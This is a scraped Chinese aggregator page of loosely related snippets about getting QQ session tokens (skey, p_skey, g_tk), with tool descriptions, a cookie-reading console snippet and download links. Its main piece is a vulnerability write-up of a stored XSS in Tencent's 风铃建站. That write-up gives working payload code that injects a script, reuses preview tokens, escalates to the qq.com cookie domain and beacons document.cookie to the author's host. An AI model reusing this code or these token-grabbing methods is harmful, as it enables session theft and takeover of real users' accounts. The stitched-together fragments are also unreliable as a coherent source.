精华内容
下载资源
问答
  • 2017-4--QQ空间登录获取SKEY、P_SKEY值样例
  • 这个是模拟QQ空间登录获取登录信息的程序,有密码登录和扫码登录2种方式,可同时获取skey、P_skey、superkey。 2016.11.23更新:更新登录协议,增加QQ密码形式为MD5的获取 2017.4.16更新:更新登录协议,增加滑动...

    介绍:

    这个是模拟QQ空间登录获取登录信息的程序,有密码登录和扫码登录2种方式,可同时获取skey、P_skey、superkey。
    2016.11.23更新:更新登录协议,增加QQ密码形式为MD5的获取
    2017.4.16更新:更新登录协议,增加滑动验证码自动识别,增加手Q验证登录方式(无需扫码和输密码)。
    2019.12.31更新:修复无法登录
    .5.9更新:增加登录过程中短信验证码的获取
    .06.29更新:修复登录验证失败
    演示:http://qweb.applinzi.com/qqtool/newsid/
    版权属于:
    缤纷彩虹天地
    post=251


    网盘下载地址:

    http://kekewl.org/51k2HJeuTtm0


    图片:



    展开全文
  • 风铃建站,桌面版预览,没有过滤QQ客服组件自上传图片url,效果页面: http://qz6666.com/iframe.html ...

    风铃建站,桌面版预览,没有过滤QQ客服组件自上传图片url,效果页面:

    http://qz6666.com/iframe.html

    http://preview.flzhan.com/default/preview?mode=pc&siteId=2000685651&url=http%3A%2F%2Fpreview.flzhan.com%2Fpreview%2Fpreview%2F2000685651%2Findex.html%3Fmode%3Dpc

    QQ图片20151225203519.png





    1.风铃建站,选择桌面模板创建网站

    http://zhan.qq.com/default/tpl?screen=1&type=1



    2.编辑,组件,添加QQ客服,组件设置中自己上传图片并在保存时抓包,更改src

    http://fl.cdn.qq.com/transition/51/2000685651/982/82044509425637198825458012571080.png#\" οnlοad=\"var s=document.createElement('script');s.src='http://qz6666.com/font.js';document.body.appendChild(s);



    3.预览,会跳转到带有token的url,token会失效,XSS获取的cookie也是flzhan.com域的

    http://preview.flzhan.com/preview/preview/2000685651/index.html?mode=pc&time=1451042318&tk=555d0e28df242f8eb34d757254028a49&r=596752



    解决token问题,抓包发现是由一个无token的url跳转的:

    http://preview.flzhan.com/default/preview?mode=pc&siteId=2000685651&url=http%3A%2F%2Fpreview.flzhan.com%2Fpreview%2Fpreview%2F2000685651%2Findex.html%3Fmode%3Dpc



    解决cookie域问题,从下面文件中看到开头一句话,尝试直接替换url中的域名

    code 区域
    http://api.zhan.qq.com/default/initJs?siteId=2000685651&page=index&target=preview&v=96196
    
    //若站点域名使用xxx.zhan.qq.com,则设置docunent.domain
    
    var topUrl = window.location.href;
    
    if(topUrl.indexOf('zhan.qq.com')>0){
    
        document.domain = 'qq.com';
    
    }





    发现有效

    http://zhan.qq.com/preview/preview/2000685651/index.html?mode=pc&time=1451042318&tk=555d0e28df242f8eb34d757254028a49&r=596752





    4.最终思路,预览无token的url,跳转到带token的url,加载xss脚本,获取token,框架加载替换域名url,获取qq.com域cookie



    code 区域
    font.js
    
    var domain = document.domain;
    
    
    
    //第一次加载domain为preview.flzhan.com,第二次加载domain为qq.com
    
    if (domain == 'preview.flzhan.com')
    
    {
    
    	var pre_token = GetCookie('previewTk_2000685651');
    
    	var pre_time = GetCookie('previewTime_2000685651');
    
    	var s = document.createElement('iframe');s.src="http://zhan.qq.com/preview/preview/2000685651/index.html?mode=pc&time="+pre_time+"&tk="+pre_token+"&r="+Math.random()*1000000;s.style.display='none';document.body.appendChild(s);
    
    }else if (domain == "qq.com")
    
    {
    
    	WriteLog();
    
    }
    
    
    
    function GetCookie(name) {
    
    	var arr = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
    
    	if (arr != null) return unescape(arr[2]);
    
    	return null;
    
    }
    
    
    
    //没搭XSS平台,下面是xsser.me中直接借的一段代码
    
    function WriteLog(){(new Image()).src='http://qz6666.com/font.asp?do=api&id=u5AqAS&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());}





    最后,又有一个问题,页面有判断referrer,必须是*.qq.com或者空,不能隐藏框架形式加载。解决,GG了一个匿名FTP,ftp跨协议:

    ftp://218.2.110.212/Webs/Mod_EnvAuto/CommonInfo/bulletininfo/test.html

    code 区域
    test.html
    
    <script>
    
    window.location="http://preview.flzhan.com/default/preview?mode=pc&siteId=2000685651&url=http%3A%2F%2Fpreview.flzhan.com%2Fpreview%2Fpreview%2F2000685651%2Findex.html%3Fmode%3Dpc";
    
    </script>





    最终效果:

    http://qz6666.com/iframe.html

    漏洞证明:

    http://preview.flzhan.com/default/preview?mode=pc&siteId=2000685651&url=http%3A%2F%2Fpreview.flzhan.com%2Fpreview%2Fpreview%2F2000685651%2Findex.html%3Fmode%3Dpc

    QQ图片20151225203519.png





    http://qz6666.com/iframe.html

    QQ图片20151225202034.png





    http://qz6666.com/cook.txt

    QQ图片20151225202505.png

    展开全文
  • 主要获取skey cookie,如需获取其他cookie,请自行修改 public class Main { public static void main(String[] args) throws Exception { String qqNumber = ""; String password = ""; QQClient qq = new QQ...
  • QQ群采集 获取bkn算法

    千次阅读 2018-09-06 09:14:34
    js 文件地址 ... c#代码  long GetBkn(string skey) { var hash = 5381; for (int i = 0, len = skey.Length; i &lt; len; ++i) hash += (hash &lt;&lt; 5) +...

    js 文件地址 http://s.url.cn/qqfind/js/find.2ce78a60.js

    c#代码 

    long GetBkn(string skey)
    {
        var hash = 5381;
        for (int i = 0, len = skey.Length; i < len; ++i) 
            hash += (hash << 5) + (int)skey[i];
        return hash & 2147483647;
    }

     

    展开全文
  • 如果单纯的获取P_UIN,SKEY,P_SKEY的值,用下面代码,在控制台输入! var p_uin = document.cookie.split(";")[0].split("=")[1]; var skey = document.cookie.split(";")[7].split("=")[1]; var p_skey = ...

    js获取cookie代码:

    var cookie = document.cookie;   
    alert(cookie);
    

    如果单纯的获取P_UIN,SKEY,P_SKEY的值,用下面代码,在控制台输入!

    var p_uin = document.cookie.split(";")[0].split("=")[1];  
    var skey = document.cookie.split(";")[7].split("=")[1];  
    var p_skey = document.cookie.split(";")[12].split("=")[1];  
    alert("p_uin="+p_uin+"\nskey="+skey+"\nP_skey="+p_skey);
    

    详细图片
    勿喷!参考!

    展开全文
  • cookie获取:qun.qq.com cookie格式: _qpsvr_localtk=0.324465224210156; uin=o2770248032;skey=@L0I7j0Zry; RK=gEJJo9ayva; ptcz=f15f941988e7b2d602542e95a9f3c3e9161f6454beb3c4e5b20990294b26ded2; p_uin=o...
  • QQ skey√ 变量:全_skeyQQ bkn√ 变量:全_bkn 取QQ头像√ 方法:Get_QQHEAD() QQ好友列表功能: 取QQ好友列表√ 方法:QQ好友_列表初始化() 取QQ好友昵称√ 变量:局_Name(列表初始化 方法内) 取QQ好友...
  • 获取账号所有联系人

    2019-10-06 14:31:03
    获取该账号的联系人信息 1、微信登陆,会有一条contact的记录...https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxgetcontact?r=1569245714654&seq=0&skey=@crypt_dd043c47_cd7df22086a7a6298493fe01e8c2940b ...
  • 绕过被封qq空间

    2016-10-27 23:11:01
    上传空间直接可运行同时获取SID、skey、P_skey、superkey,对于被封QQ空间的号码也能成功获取到登录信息。注意扫码无法获取SID。
  • skey= 账号获取contact新的接口: <strong>https://wx2.qq.com</strong>/cgi-bin/mmwebwx-bin/webwxgetcontact?r=1471272220798&seq=0&skey= 逻辑有比较大改动!</p><p>该提问...
  • https://wx.qq.com/cgi-bin/mmwebwx-bin/webwxgetcontact? pass_ticket=ovyLkGVM8W6lUAbZpt%252BhgJdeomQYRPOu8yf6FkW%252B7GE5Meq4S3qn4Qz%252FQyD64vsD ...&seq=0&skey=@crypt_597aeefd_95352fe3754
  • https://wx.qq.com/cgi-bin/mmwebwx-bin/webwxsync?sid=59l6dzO93b47Zd/H&skey=@crypt_597aeefd_4b263f7393be4254a150baa608a7d821&pass_ticket=urqVbHsQ%252FbfitCOHwVVlpEsieXi4qXKmLZ2EMXZzx%252BcN0H9WYGGJUK3sP
  • WebQQ协议分析(2)——获取登录令牌

    万次阅读 2010-08-19 13:39:00
    现在已经有skey、ptcz、ptwebqq 和 verifysession 四个参数了,下面获取传说中的登录令牌。     前面的四个参数,即verifysession、skey、ptcz和ptwebqq都要放到Cookie里(如果用WinInit则...
  • 最新Java模拟登陆QQ空间【2017-12-22】有效 代码在2017-12-22编写完成并测试通过! 功能: ...4.cookie值p_skey,RK,pt4_token,pt_login_sig,ptdrvs,ptvfsession,skey,superkey,supertoken等值的获取
  • 在使用网页版微信协议的过程中发现,是相同地址,通过网页登陆上去后,就能获取并收听到音频,而通过程序的就不行。https://wx.qq.com/cgi-bin/mmwebwx-bin/webwxgetvoice?msgid=%s&skey=%s 比如将以上地址,在...
  • 获取微信文章点赞数和阅读数

    千次阅读 2016-03-10 16:05:00
    第一步登录微信网页版然后在聊天框里面发送一个文章链接用浏览器f12查看连接你就会看到类似的链接https://wx2.qq.com/cgi-bin/mmweb ... 6aea0261f14c2261851skey后面的值就是你用户值每个用户都不一样接着url转码...
  • 第一步登录微信网页版然后在聊天框里面发送一个文章链接用浏览器f12查看连接你就会看到类似的链接https://wx2.qq.com/cgi-bin/mmweb ... 6aea0261f14c2261851skey后面的值就是你用户值每个用户都不一样接着url转码...
  • Java程序模拟QQ空间登录 - 并模拟刷说说的赞(图文) 详细流程图文说明请看: ... a.Java模拟QQ空间登录,获取Cookie b.Java的QQ空间请求的G_TK算法skey算法 c.QQ空间登录的MD5算法 d.QQ刷说说赞
  • 项目是采用VS2008 写的,希望高手帮忙解决...成功获取了农场的COOKIE:login_time、uin、skey、verifysession 但是,当访问:http://nc.qzone.qq.com/cgi-bin/cgi_farm_index?mod=user&act=run获取农场信息的时...
  • [QQ]G_TK算法

    万次阅读 2018-09-20 18:26:45
    Note:获取到cookie,判断cookie中是否有p_skey,没有使用skey;点击传送到JS function getToken(c) { var obj = JSON.parse("{\"" + c.replace(/=/g,"\":\"").replace(/; /g,&...
  • 技术揭秘QQ空间”自动转发不良信息

    千次阅读 2017-04-06 09:01:47
    最近通过对一个QQ空间自动转发链接进行分析,发现该自动转发机制通过利用腾讯网站存在漏洞的页面,精心构造出利用代码获取用户的QQ号和skey值,从而获得用户的一些敏感操作权限。并通过该漏洞自动转发一些不良信息...
  • QQ空间日志HTML分析 “blogDetailDiv[^>]*>([\s\S]+?)\n" QQ空间日志列表页面(abs)分析"{([\\s\\S][^{}]*cate[^\n]*\n\"cateHex[^\n]*\...cookie中获取p_skey "p_skey=([^;]*)" 其他键值只需更改名字 主页 g_NowTi
  • python整合selenium爬取QQ空间访客记录

    千次阅读 2019-03-10 12:56:10
    利用周末放假两天时间写了个QQ空间访客记录的爬虫,在这里分享出来;本文将会把要做的步骤都列出来,一步一步的实现这个爬虫程序。 特别注明: 本程序仅供学习交流目的 请勿用于不可描述的事情 爬取过程中需要...
  • QQ农场辅助精灵DotNet(c#)版是2009年8月份自已编写的,开发工具是vs2005,语言c#,花了数十小时编写与调试,也算是检验编写辅助外挂类程序的能力...首先需要获取skey(也就是sessionId),方法一,不编写登录的功能时
  • 2020-07-09

    2020-07-09 09:38:08
    /,QQskey请自行获取 t() { ss("http://47.94.135.214/QQqiandao.php?skey="+sss.skey+"&qq="+sss.yun+"&group=&poi=签到地点&text=签到内容",url) syso(url) hs(url, a) f(a?"成功") { ...
  • g_tk算法详解

    千次阅读 2014-07-17 01:44:30
    g_tk是腾讯在QQ空间这一领域使用的密文(其他的地方我没遇到g_tk),有写数据包或者url参数中需要加入你计算出的g_tk才能成功!但是也有例外,也有些地方不需要g_tk也一样成功,为了...所以想计算g_tk必须先获取skey
  • 文章目录1.获取基本信息2.引入相关jar包3.配置请求url4.配置白名单路径5.接收消息和事件推送6....登陆下,然后获取appid和skey 2.引入相关jar包 这些jar包就不说了,json,xml处理,日志,lang 3.配置...
  • 彩虹云任务是一套秒赞网源码,彩虹云任务V7.8破解版源码,需要搭建的...3.自动更新SKEY可对接打码平台 4.修复秒赞获取说说列表 5.恢复QQ音乐一键加速 6.增加QQ钱包支付即时到账 7.修复浮动播放器歌曲解析失败

空空如也

空空如也

1 2
收藏数 32
精华内容 12
关键字:

qqskey获取